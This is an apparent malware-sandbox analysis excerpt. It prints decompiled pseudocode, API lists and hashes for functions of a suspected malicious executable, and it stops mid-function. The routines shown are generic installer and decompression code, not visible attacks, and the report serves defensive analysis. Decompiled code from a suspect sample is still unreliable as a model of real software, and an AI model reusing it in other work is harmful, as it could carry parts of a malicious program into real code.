                                                                                        • Instruction ID: 7bdb262dbebad2fb51735791196b4a750b565e3ebaa120aaaad2cbe3184e43fd
                                                                                        • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                        • Instruction Fuzzy Hash: B1F0A73734820876E7105E55DC04B9B7F9DDF91760F14C027FE44DA1C0D6B49954C7A5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 737616DB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 94%
                                                                                        			E737616DB(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v88;
				struct HINSTANCE__* _t37;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x7376405c = _a8;
				 *0x73764060 = _a16;
				 *0x73764064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x73764038, E73761556);
				_push(1); // executed
				_t37 = E73761A98(); // executed
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E737622AF(_t54);
					}
					E737622F1(_t67, _t54);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x810) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_t37 = E737624D8(_t54);
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x818; // 0x818
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E7376156B(_t54,  &_v88);
								 *(_t54 + 0x834) =  *(_t54 + 0x834) & 0x00000000;
								_t18 = _t54 + 0x818; // 0x818
								_t72 = _t18;
								 *((intOrPtr*)(_t54 + 0x820)) = _t42;
								 *_t72 = 3;
								E737624D8(_t54);
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							E737624D8(_t54);
							_t37 = GlobalFree(E73761266(E73761559(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E7376249E(_t54);
							if(( *(_t54 + 0x810) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x808);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x810) & 0x00000020) != 0) {
								_t37 = E737614E2( *0x73764058);
							}
						}
						if(( *(_t54 + 0x810) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t54);
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E73762CC3(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E73762A38(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E737626B2(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}


















                                                                                        0x737616db
                                                                                        0x737616db
                                                                                        0x737616db
                                                                                        0x737616e5
                                                                                        0x737616ed
                                                                                        0x737616fa
                                                                                        0x73761708
                                                                                        0x7376170b
                                                                                        0x7376170d
                                                                                        0x73761712
                                                                                        0x73761717
                                                                                        0x73761836
                                                                                        0x73761836
                                                                                        0x7376171d
                                                                                        0x73761721
                                                                                        0x73761724
                                                                                        0x73761729
                                                                                        0x7376172b
                                                                                        0x73761731
                                                                                        0x73761737
                                                                                        0x73761767
                                                                                        0x7376176e
                                                                                        0x73761792
                                                                                        0x737617dd
                                                                                        0x73761794
                                                                                        0x73761794
                                                                                        0x73761795
                                                                                        0x7376179b
                                                                                        0x7376179c
                                                                                        0x737617a6
                                                                                        0x737617a9
                                                                                        0x737617ae
                                                                                        0x737617b5
                                                                                        0x737617b5
                                                                                        0x737617bc
                                                                                        0x737617c2
                                                                                        0x737617c8
                                                                                        0x737617d5
                                                                                        0x737617d6
                                                                                        0x737617d9
                                                                                        0x73761770
                                                                                        0x73761771
                                                                                        0x73761786
                                                                                        0x73761786
                                                                                        0x737617e7
                                                                                        0x737617ea
                                                                                        0x737617f7
                                                                                        0x737617fe
                                                                                        0x73761806
                                                                                        0x73761809
                                                                                        0x73761809
                                                                                        0x73761806
                                                                                        0x73761816
                                                                                        0x7376181e
                                                                                        0x73761823
                                                                                        0x73761816
                                                                                        0x7376182b
                                                                                        0x00000000
                                                                                        0x7376182d
                                                                                        0x00000000
                                                                                        0x7376182e
                                                                                        0x7376182b
                                                                                        0x7376173b
                                                                                        0x7376173e
                                                                                        0x7376175c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x7376175f
                                                                                        0x73761764
                                                                                        0x73761764
                                                                                        0x73761766
                                                                                        0x00000000
                                                                                        0x73761766
                                                                                        0x73761740
                                                                                        0x73761741
                                                                                        0x73761749
                                                                                        0x7376174a
                                                                                        0x00000000
                                                                                        0x7376174a
                                                                                        0x73761743
                                                                                        0x73761744
                                                                                        0x73761752
                                                                                        0x00000000
                                                                                        0x73761752
                                                                                        0x73761747
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761747

                                                                                        APIs
                                                                                          • Part of subcall function 73761A98: GlobalFree.KERNEL32 ref: 73761D09
                                                                                          • Part of subcall function 73761A98: GlobalFree.KERNEL32 ref: 73761D0E
                                                                                          • Part of subcall function 73761A98: GlobalFree.KERNEL32 ref: 73761D13
                                                                                        • GlobalFree.KERNEL32 ref: 73761786
                                                                                        • FreeLibrary.KERNEL32(?), ref: 73761809
                                                                                        • GlobalFree.KERNEL32 ref: 7376182E
                                                                                          • Part of subcall function 737622AF: GlobalAlloc.KERNEL32(00000040,?), ref: 737622E0
                                                                                          • Part of subcall function 737626B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,73761757,00000000), ref: 73762782
                                                                                          • Part of subcall function 7376156B: wsprintfA.USER32 ref: 73761599
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.213558284.0000000073761000.00000020.00020000.sdmp, Offset: 73760000, based on PE: true
                                                                                        • Associated: 00000000.00000002.213546803.0000000073760000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.213566406.0000000073763000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.213570908.0000000073765000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 3962662361-3916222277
                                                                                        • Opcode ID: 7898cff5ec25a0346c5f1e764afde8f60b2a1b345bc232846fd72dfc45800841
                                                                                        • Instruction ID: c97eaf30aeda98808f6f90a9bc911d93782c22dea59a79433bbe9a3e4f249fa4
                                                                                        • Opcode Fuzzy Hash: 7898cff5ec25a0346c5f1e764afde8f60b2a1b345bc232846fd72dfc45800841
                                                                                        • Instruction Fuzzy Hash: 27418172500309DBDB01AF648AFCB9537ECBB04321F189469ED0BAF1D6DB788445CBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00403208, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 84%
                                                                                        			E00403208(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
				E00405DC8(_t6);
				_t2 = E004056C6(_t6);
				if(_t2 != 0) {
					E00405659(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E0040586C("1033", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}






                                                                                        0x00403209
                                                                                        0x0040320f
                                                                                        0x00403215
                                                                                        0x0040321c
                                                                                        0x00403221
                                                                                        0x00403229
                                                                                        0x00403235
                                                                                        0x0040323b
                                                                                        0x0040321f
                                                                                        0x0040321f
                                                                                        0x0040321f

                                                                                        APIs
                                                                                          • Part of subcall function 00405DC8: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SX365783909782021.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E20
                                                                                          • Part of subcall function 00405DC8: CharNextA.USER32(?,?,?,00000000), ref: 00405E2D
                                                                                          • Part of subcall function 00405DC8: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SX365783909782021.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E32
                                                                                          • Part of subcall function 00405DC8: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\SX365783909782021.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E42
                                                                                        • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00403229
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Char$Next$CreateDirectoryPrev
                                                                                        • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                        • API String ID: 4115351271-1075807775
                                                                                        • Opcode ID: 6efbcda31fdcc81e1bc9b7455ac61b895c89039b7b6caaf7bbff9198608db7ec
                                                                                        • Instruction ID: 28437e5e833f6c5712a3d87292ca06883de7807d6adf700678bf42288e0e849f
                                                                                        • Opcode Fuzzy Hash: 6efbcda31fdcc81e1bc9b7455ac61b895c89039b7b6caaf7bbff9198608db7ec
                                                                                        • Instruction Fuzzy Hash: 11D0C922656E3032C651363A3C0AFDF091C8F5271AF55847BF908B40D64B6C5A5259EF
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00406566, Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 99%
                                                                                        			E00406566() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004069D4))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
